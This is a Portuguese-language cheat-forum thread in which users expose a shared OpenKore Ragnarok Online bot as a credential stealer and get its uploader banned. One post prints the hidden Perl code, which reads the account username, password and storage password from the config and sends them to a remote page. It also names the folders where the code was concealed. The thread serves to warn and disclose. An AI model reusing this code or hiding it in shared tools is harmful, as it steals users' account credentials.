Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

OPENKORE 2.7,Video Aula,Macro+Campal,Scan,Totalmente Renewal,Limpo e Funfando


Posts Recomendados

Bem é só os que baixarem, se tiverem a boa vontade, voltar e comentar se acontecer algo estranho .-.

quanto mais informações melhor, entao se puderem ajudem ai, seja pra promover ou para denunciar

mlz aew susano mas a verdade tem q ser dita xD

tem muito karinha safado aki se disfarçando de uma pessoa com boa vontade pra roubar senhas dos nossos colégas ^^

então a desconfiança faz parte msm, é só um jeito de melhorar ainda mais o wb

Link para o comentário
Compartilhar em outros sites

Gente é o seguinte, para aqueles que estão tentando entrar no link "sonhando que vão achar uma página cheia de contas" vão tirando o cavalinho da chuva, o link só pode ser aberto pelo computador que foi usado para a criação do hacker, pois o computador possue um IP unico, e esse IP unico faz com q somente dakele computador você possa acessar o site PHP, isso é tipo um keylogger, mas em vez de mandar para o email, manda para uma pagina criada especialmente para o mesmo.

Ou seja, não tentem nem acessar o link q nunca vai dar certo, somente o kra q criou o hack pode acessalo, entenderam?

Se eu fusse vocês eu não usava isso =x, claro, a menos que estejam a fim de ver seu char online em quanto você está na escola^^.

Link para o comentário
Compartilhar em outros sites

Topico Falço! Tem KL nessa merd#, quem acha que ele vai enganar -.-"[/size]

 

#Reporte

 

 

Cara também não é bem assim, nao existe nada de keylogger, mas existe uma função imbutida no documento php em que atribui uma variavel chamada Password, outra chamada Kafra password, e outra User, então o que essas variaveis fazem?? Elas estao setadas para capturar esses valores citados acima e enviar para o banco de dados desse cara ai, então o banco de dados dele é privado, quem tem o acesso é ele, se tentarem acessar o link nao vão conseguir, sabem por que??

 

Hacker- OI EU SOU O MAIOR CRACKER DE TODOS OS TEMPOS.

Eu- A é?? QUE BOM, o que voce faz??

Hacker- EU ROUBO CONTAS DE RAGNAROK DOS TROUXAS.

Eu- A é?? mas como faz isso??

Hacker- Eu atribuo uma função no macro.pl para enviar todos os dados do trouxa para meu banco de dados.

Eu- Nossa você é bom, mas como você faz para poder pegar essas senhas?

Hacker- Simples, através do link eu posso acessar de onde eu estiver só tendo o link da minha pagina php.

Eu- NOOOOOSSA. Mas eu tenho uma dúvida, então isso quer dizer que qualquer pessoa que tiver o link pode ter acesso as senhas roubadas??

Hacker- Ahn??

Hacker- Porra não pensei nisso, FFFFFFFFFFUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU...

 

--Fim--

 

Pelo amor de Deus, deixem de ser BURROS, será que voces conseguem enxergar algum hacker do tipo citado acima, ah seus burros voces acham que vao entrar no banco de dados do cara só pelo link??? E ai conseguir roubar um ladrão e ter 100 anos de perdao só assim?? Ahh vão estudar filhos da puta e parem de jogar ragnarok.

 

Cara também não é bem assim, nao existe nada de keylogger, mas existe uma função imbutida no documento php em que atribui uma variavel chamada Password, outra chamada Kafra password, e outra User, então o que essas variaveis fazem?? Elas estao setadas para capturar esses valores citados acima e enviar para o banco de dados desse cara ai, então o banco de dados dele é privado, quem tem o acesso é ele, se tentarem acessar o link nao vão conseguir, sabem por que??

 

Hacker- OI EU SOU O MAIOR CRACKER DE TODOS OS TEMPOS.

Eu- A é?? QUE BOM, o que voce faz??

Hacker- EU ROUBO CONTAS DE RAGNAROK DOS TROUXAS.

Eu- A é?? mas como faz isso??

Hacker- Eu atribuo uma função no macro.pl para enviar todos os dados do trouxa para meu banco de dados.

Eu- Nossa você é bom, mas como você faz para poder pegar essas senhas?

Hacker- Simples, através do link eu posso acessar de onde eu estiver só tendo o link da minha pagina php.

Eu- NOOOOOSSA. Mas eu tenho uma dúvida, então isso quer dizer que qualquer pessoa que tiver o link pode ter acesso as senhas roubadas??

Hacker- Ahn??

Hacker- Porra não pensei nisso, FFFFFFFFFFUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU...

 

--Fim--

 

Pelo amor de Deus, deixem de ser BURROS, será que voces conseguem enxergar algum hacker do tipo citado acima, ah seus burros voces acham que vao entrar no banco de dados do cara só pelo link??? E ai conseguir roubar um ladrão e ter 100 anos de perdao só assim?? Ahh vão estudar filhos da puta e parem de jogar ragnarok.

 

Bom, seu eu apagar a parte do Keylogger e salvar. o Kore ficara livre dele certo, assim poderei usar normalmente ?

Certo ?

 

Correto :sim:, é só apagar a linha do site ou simplesmente o ".com" como citei acima.

Link para o comentário
Compartilhar em outros sites

jente existe infinitas possibilidades de por comando desse no kore,em infinitas pastas pode colocar,ate em linguagem programatica que nunca jamais ninguem ira saber oque é,intaum essa linha ae está desabilitada,repito não está funcionando,o bot ta limpo

Link para o comentário
Compartilhar em outros sites

jente existe infinitas possibilidades de por comando desse no kore,em infinitas pastas pode colocar,ate em linguagem programatica que nunca jamais ninguem ira saber oque é,intaum essa linha ae está desabilitada,repito não está funcionando,o bot ta limpo

 

Então, quem se considera inteligente vai na onda do trouxa acima =).

Link para o comentário
Compartilhar em outros sites

CORRIGINDO, ESSE ARQUIVO MACRO NA VERDADE ESTÁ RENOMEADO, AO ABRIR COM O BLOCO DE NOTAS VOCÊ VERÁ QUE NA VERDADE SE CHAMA KLOGGER, ABREVIAÇÃO TOSTA DE KEYLOGGER, BOM ESSE ARQUIVO SERVE PARA CAPTURAR NOSSAS SENHAS E MANDAR PARA UM PAGINA CHMADA "PAGINA PEGA SENHA" OU SE PREFERIREM "PAGINA PHP" MUITO USADA POR HACKS DE KL , BOM ESSES CÓDIGOS PODEM SER ENCONTRADOS NOS SEGUINTES LOCAIS:

 

 

PASTA PLUING>MACRO OU PASTA PLUING>PATCH21 LEMBRANDO QUE OS ARQUIVOS SÃO OS MESMOS SÓ QUE COM NOMES DIFERENTES PARA ENGANAR VOCÊ, PODE VIR COM QUALQUER NOME DENTRO DA PASTA PLUING, BASTA ABRIR COMO BLOCO DE NOTAS E ACHAR A LINHA.

 

 

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

 

 

 

 

BOM EXISTE TAMBÉM OUTRO LUGAR, VÁ NA PASTA SRC>NETWOORK>SEND E ACHE O ARQUIVO SERVERTIPE0 ABRAO COMO BLOCO DE NOTAS E ACHE ESTE MESMO CÓDIGO ACIMA.

 

ESPERO TER AJUDADO, VISITE MINHA QUICK LIST ONDE ADICIONEI ESSE TÓPICO COMO MALICIOSO LÁ>>> http://www.webcheats.com.br/forum/rag-cheats/983122-quick-list-bots-confiaveis-e-bots-nao-confiaveis.html

Link para o comentário
Compartilhar em outros sites

Confirmado, podem bani-lo.

 

Ahhhh, CHAMPZ, essa é pra voce, agora depois de tantas desculpas como forma de pegar mais trouxas, sabe que isso é crime federal ne?? cuidado pq qualquer dia a policia federal pode bater na tua porta CHAMPZ ^^

 

Nao ligo pra o char, nao me falta zeny, muito menos itens =)

 

Quer saber oq aconteceu com uma conta cobaia que usei??

 

lvlupp.png

 

Coloquei uns itens para atrai-lo como espirito olimpico, pintinho e 6kk =), mas eu tenho outra e voce nao rouba, agora da pra banir esse cara??

Link para o comentário
Compartilhar em outros sites

jente existe infinitas possibilidades de por comando desse no kore,em infinitas pastas pode colocar,ate em linguagem programatica que nunca jamais ninguem ira saber oque é,intaum essa linha ae está desabilitada,repito não está funcionando,o bot ta limpo

 

Entaum quer dizer que você já pensou em colocar em várias pastas e em linguagem programatica O.o??? se não tivesse pensado tu não teria citado isso no forum, correto?

Link para o comentário
Compartilhar em outros sites

eu não sei fazer isso,o bot do killerzum tem keylogger escondido em liguagem programatica no bot ou no active perl dele,e ninguem tiro o dele da quick list,se voltar os topicos do bot dele vai ver que ums 100 falow que foi hakeado,intão o unico que nao rouba nd é o meu,

Link para o comentário
Compartilhar em outros sites

aki não apareceu nenhum poseidon cliente

 

itendo pouco mais o poseidon client está dentro da data da pasta arquivos que vao na pasta bro,so copiar tudo que estiver dentro da pasta Arquivos que vao dentro da pasta bro e colocar dentro da sua apsta ragnarok

 

eu fiz isso mais n apareceu poseidon cliente me ajuda por favor

 

Alguem me ajuda pelo amor de deus como eu pego esse poseidon cliente

Link para o comentário
Compartilhar em outros sites

o bot do killerzinho não roubou ninguem tanto que ele tem 41 agradecimentos, bom com 41 agradecimentos não preciso falar mais nada né,não venha incriminar os outros pelos seus atos, eu não irei tirar o bot dele da minha quick, pois está seguro, diferente do seu

Link para o comentário
Compartilhar em outros sites

Para de postar com a conta fake da sua irma o fdp, ninguem vai acreditar nessa historia de "manin vem instalar pra mim" isso tudo é só para atualizar seu post e você roubar mais seu vigarista de merda, o frde já provou que tinha código e você dando uma de santinho, aaaaaaaaaahhhh tenha dó sinceramente patético.

 

Daqui a pouco você vai postar aqui que tem scan e está limpo, mas não se trata de scan e sim de um código que não é um virus e sim um código! Que manda para sua página!

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.